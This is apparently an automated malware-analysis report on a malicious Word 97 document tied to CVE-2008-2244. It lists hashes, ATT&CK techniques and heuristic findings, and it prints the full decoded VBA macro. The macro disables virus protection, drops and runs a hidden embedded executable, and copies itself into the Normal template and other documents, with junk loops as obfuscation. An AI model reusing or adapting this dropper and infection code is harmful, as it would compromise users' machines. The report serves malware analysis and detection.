Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 8202390305aeb147…

MALICIOUS

Office (OLE)

Size: 85.5 KB
Created: 2000-06-23 21:52:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: 5e0e40b876949f3b0158738851dbdffe
SHA-1: bf7bd975517bb10f213fd3ab37a6744cd42b5fc0
SHA-256: 8202390305aeb14776467e3ab4a897d9c9799e9f52388eb47b4ad9de5e74b866
Risk Score: 480

Malware Insights

MITRE ATT&CK
T1204.002 Malicious File
T1059.005 Visual Basic
T1203 Exploitation for Client Execution

The sample is a malicious Microsoft Word document that exploits CVE-2008-2244, a vulnerability in Word's record parsing. It contains VBA macros that call the Shell() function, and it references the WinExec, CreateProcess, LoadLibrary, and GetProcAddress APIs, indicating that it likely executes a payload. An embedded PE executable was also detected, and the VBA script attempts to save it to 'c:\normal.exe'.

Heuristics 11

  • CVE-2008-2244 — Microsoft Word record-parsing payload critical CVE likely CVE_2008_2244
    Word OLE document has normal small WordDocument/table streams, a large unallocated OLE slack region, and an executable or resolver shellcode payload in that slack. This is the static shape of the MS08-042 Word record-parsing exploit family tracked as CVE-2008-2244.
  • ClamAV: Doc.Trojan.Marker-14 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Marker-14
  • Embedded PE executable critical OLE_EMBEDDED_EXE
    MZ/PE header found inside document — possible embedded executable
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
             CloseFile dh
              Shell "c:\normal.exe", vbHide
  • Reference to WinExec API high SC_STR_WINEXEC
    Reference to WinExec API
  • Reference to CreateProcess API high SC_STR_CREATEPROCESS
    Reference to CreateProcess API
  • Reference to LoadLibrary API high SC_STR_LOADLIBRARY
    Reference to LoadLibrary API
  • Reference to GetProcAddress API high SC_STR_GETPROCADDRESS
    Reference to GetProcAddress API
  • OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY
    OLE file is 87,552 bytes but its declared streams total only 32,421 bytes — 55,131 bytes (63%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
  • Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOC
    Reference to VirtualAlloc API

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 21371 bytes
SHA-256: a19a345df0d5958b5a8c34c7ceb99c73774f9f2b95bd722b3e4ac2973ea53bf6
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Declare Function SetEndOfFile Lib "kernel32" Alias "setendoffile" (ByVal h As Long) As Boolean
Private Declare Function OpenFile Lib "kernel32" Alias "_lopen" (ByVal s As String, ByVal mode As Long) As Long
Private Declare Function CreateFile Lib "kernel32" Alias "_lcreat" (ByVal s As String, ByVal attr As Long) As Long
Private Declare Function GlobalAlloc Lib "kernel32" (ByVal fl As Long, ByVal n As Long) As Long
Private Declare Sub CopyFileA Lib "kernel32" (ByVal src As String, ByVal dst As String, ByVal mode As Long)
Private Declare Function SeekFile Lib "kernel32" Alias "_llseek" (ByVal h As Long, ByVal ofs As Long, ByVal fw As Long) As Long
Private Declare Sub ReadFile Lib "kernel32" Alias "_lread" (ByVal h As Long, ByVal ptr As Long, ByVal n As Long)
Private Declare Sub WriteFile Lib "kernel32" Alias "_lwrite" (ByVal h As Long, ByVal ptr As Long, ByVal n As Long)
Private Declare Sub CloseFile Lib "kernel32" Alias "_lclose" (ByVal h As Long)

Private Sub Document_Close()

On Error Resume Next
Options.VirusProtection = False
Const ker = "Miсrоsоft Оfficе"

Dim SaveDocument, SaveNormalTemplate, DocumentInfected, NormalTemplateInfected As Boolean
Dim dad, dnt As Object
Dim OurCode, UserAddress, LogData, LogFile As String
Dim dc As String, xe As String
Dim dh As Long, dp As Long, ss As Long
Dim x_z, z_y, z_z, z_a, z_b As Long
For x_z = 1 To 30
 z_y = 2
 z_z = 6
 z_a = 9
 z_b = 1
Next x_z
xe = "c:\normal.exe"

For x_z = 1 To 30
 z_y = 2
 z_z = 6
 z_a = 9
 z_b = 1
Next x_z

Set dad = ActiveDocument.VBProject.VBComponents.Item(1)
For x_z = 1 To 30
 z_y = 2
 z_z = 6
 z_a = 9
 z_b = 1
Next x_z
Set dnt = NormalTemplate.VBProject.VBComponents.Item(1)
For x_z = 1 To 30
 z_y = 2
 z_z = 6
 z_a = 9
 z_b = 1
Next x_z
DocumentInfected = dad.CodeModule.Find(ker, 1, 1, 10000, 10000)
For x_z = 1 To 30
 z_y = 2
 z_z = 6
 z_a = 9
 z_b = 1
Next x_z
NormalTemplateInfected = dnt.CodeModule.Find(ker, 1, 1, 10000, 10000)
For x_z = 1 To 30
 z_y = 2
 z_z = 6
 z_a = 9
 z_b = 1
Next x_z
dc = ActiveDocument.Name
For x_z = 1 To 30
 z_y = 2
 z_z = 6
 z_a = 9
 z_b = 1
Next x_z

 dp = GlobalAlloc(0, 50698)
 dh = OpenFile(dc, 0)
For x_z = 1 To 30
 z_y = 2
 z_z = 6
 z_a = 9
 z_b = 1
Next x_z
 
 If SetEndOfFile(dh) Then
        ss = SeekFile(dh, -50688, 2)
        ReadFile dh, dp, 50688
        CloseFile dh
For x_z = 1 To 30
 z_y = 2
 z_z = 6
 z_a = 9
 z_b = 1
Next x_z
        
         dh = CreateFile(xe, 0)
         WriteFile dh, dp, 50698
         CloseFile dh
          Shell "c:\normal.exe", vbHide
           
        End If
        

For x_z = 1 To 30
 z_y = 2
 z_z = 6
 z_a = 9
 z_b = 1
Next x_z

If (DocumentInfected = True Xor NormalTemplateInfected = True) And _
   (ActiveDocument.SaveFormat = wdFormatDocument Or _
   ActiveDocument.SaveFormat = wdFormatTemplate) Then
 
   
For x_z = 1 To 30
 z_y = 2
 z_z = 6
 z_a = 9
 z_b = 1
Next x_z

   If DocumentInfected = True Then
      SaveNormalTemplate = NormalTemplate.Saved
      OurCode = dad.CodeModule.Lines(1, dad.CodeModule.CountOfLines)

For x_z = 1 To 30
 z_y = 2
 z_z = 6
 z_a = 9
 z_b = 1
Next x_z

      For i = 1 To Len(Application.UserAddress)
      If Mid(Application.UserAddress, i, 1) <> Chr(13) Then
        If Mid(Application.UserAddress, i, 1) <> Chr(10) Then
          For x_z = 1 To 30
 z_y = 2
 z_z = 6
 z_a = 9
 z_b = 1
Next x_z
          UserAddress = UserAddress & Mid(Application.UserAddress, i, 1)
        End If
      Else
        UserAddress = UserAddress & Chr(13) & "' "
      End If
     Next i

For x_z = 1 To 30
 z_y = 2
 z_z = 6
 z_a = 9
 z_b = 1
Next x_z
  
    
    dnt.CodeModule.DeleteLines 1, dnt.CodeModule.CountOfLines
For x_z = 1 To 30
 z_y = 2
 z_z = 6
 z_a = 9
 z_b = 1
Next x_z
    dnt.CodeModule.AddFromString OurCode
 For x_z = 1 To 30
 z_y = 2
 z_z = 6
 z_a = 9
 z_b = 1
Next x_z
    If SaveNormalTemplate = True Then NormalTemplate.Save
For x_z = 1 To 30
 z_y = 2
 z_z = 6
 z_a = 9
 z_b = 1
Next x_z
    
  End If


  If NormalTemplateInfected = True And _
     (Mid(ActiveDocument.FullName, 2, 1) = ":" Or _
     ActiveDocument.Saved = False) Then
For x_z = 1 To 30
 z_y = 2
 z_z = 6
 z_a = 9
 z_b = 1
Next x_z
    SaveDocument = ActiveDocument.Saved
For x_z = 1 To 30
 z_y = 2
 z_z = 6
 z_a = 9
 z_b = 1
Next x_z
    
    OurCode = dnt.CodeModule.Lines(1, dnt.CodeModule.CountOfLines)
For x_z = 1 To 30
 z_y = 2
 z_z = 6
 z_a = 9
 z_b = 1
Next x_z
    dad.CodeModule.DeleteLines 1, dad.CodeModule.CountOfLines
For x_z = 1 To 30
 z_y = 2
 z_z = 6
 z_a = 9
 z_b = 1
Next x_z
    dad.CodeModule.AddFromString OurCode
For x_z = 1 To 30
 z_y = 2
 z_z = 6
 z_a = 9
 z_b = 1
Next x_z
    
    If SaveDocument = True Then ActiveDocument.Save
For x_z = 1 To 30
 z_y = 2
 z_z = 6
 z_a = 9
 z_b = 1
Next x_z
      
  End If
  
For x_z = 1 To 30
 z_y = 2
 z_z = 6
 z_a = 9
 z_b = 1
Next x_z
    
End If
For x_z = 1 To 30
 z_y = 2
 z_z = 6
 z_a = 9
 z_b = 1
Next x_z

End Sub







embedded_office_00009000.exe | embedded-pe | Office MZ+PE at offset 0x9000 | 50688 bytes
SHA-256: fbe435be06293624b70f8a040968c9852f9841b20ecba3617a85c1c4a782ab11